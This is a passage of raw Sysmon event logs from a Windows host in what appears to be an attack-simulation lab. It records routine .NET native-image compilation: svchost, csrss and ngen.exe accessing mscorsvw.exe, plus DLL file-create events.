indows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.416{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9211-6005-AA03-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:09.416{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9211-6005-AA03-00000000A301}3916C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007961Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:09.369{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9211-6005-A903-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007960Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:09.353{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9211-6005-A903-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007959Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:09.353{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9211-6005-A903-00000000A301}2956C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007958Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:09.260{59A5CD1D-9210-6005-A803-00000000A301}1244C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\4dc-0\Microsoft.Transactions.Bridge.dll2021-01-18 13:50:09.260 10341000x80000000000000007978Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:10.541{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9212-6005-AE03-00000000A301}4444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007977Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:10.541{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9212-6005-AE03-00000000A301}4444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007976Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:10.541{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9212-6005-AE03-00000000A301}4444C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:10.447{59A5CD1D-9212-6005-AD03-00000000A301}1580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\62c-0\Microsoft.VisualBasic.Activities.Compiler.dll2021-01-18 13:50:10.447 10341000x80000000000000007974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:10.103{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9212-6005-AD03-00000000A301}1580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:10.088{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-9212-6005-AD03-00000000A301}1580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:10.088{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9212-6005-AD03-00000000A301}1580C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000007981Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:11.088{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9213-6005-AF03-00000000A301}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007980Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:11.072{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9213-6005-AF03-00000000A301}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007979Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:11.072{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9213-6005-AF03-00000000A301}4552C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ae03(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c43d(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+c4ad(wow64)|C:\Windows\System32\KERNEL32.DLL+162c4(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60779(wow64)|C:\Windows\SYSTEM32\ntdll.dll+60744(wow64) 10341000x80000000000000008002Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:12.947{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9214-6005-B503-00000000A301}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000008001Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.931{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9214-6005-B503-00000000A301}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000008000Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:12.931{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9214-6005-B503-00000000A301}5040C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 10341000x80000000000000007999Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:12.853{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9214-6005-B403-00000000A301}4344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007998Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.837{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9214-6005-B403-00000000A301}4344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007997Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:12.837{59A5CD1D-90A3-6005-3001-00000000A301}41442936C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9214-6005-B403-00000000A301}4344C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+927a7|C:\Windows\SYSTEM32\ntdll.dll+c6c62|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a642(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+ad30(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+abce(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+af4a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b1b4(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8f0a(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+8fe3(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+9082(wow64) 11241100x80000000000000007996Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:50:12.791{59A5CD1D-9214-6005-B303-00000000A301}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\Temp\12a8-0\Microsoft.VisualC.dll2021-01-18 13:50:12.791 10341000x80000000000000007995Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:12.775{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-9214-6005-B303-00000000A301}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000007994Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:50:12.759{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9214-6005-B303-00000000A301}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000007993Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:50:12.759{59A5CD1D-90A3-6005-3001-00000000A301}41444264C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exe{59A5CD1D-9214-6005-B303-00000000A301}4776C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\wow64.dll+10c0b|C:\Windows\System32\wow64.dll+10499|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+77e0d|C:\Windows\SYSTEM32\ntdll.dll+77cae|C:\Windows\SYSTEM32\ntdll.dll+6f85c(wow64)|C:\Windows\System32\KERNELBASE.dll+d90a8(wow64)|C:\Windows\System32\KERNELBASE.dll+d7d7c(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+b37e(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+73b7(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorsvc.dll+a4c6(wow64)|C:\Windows\Microsoft.NET\Framework\v4.0.30319\m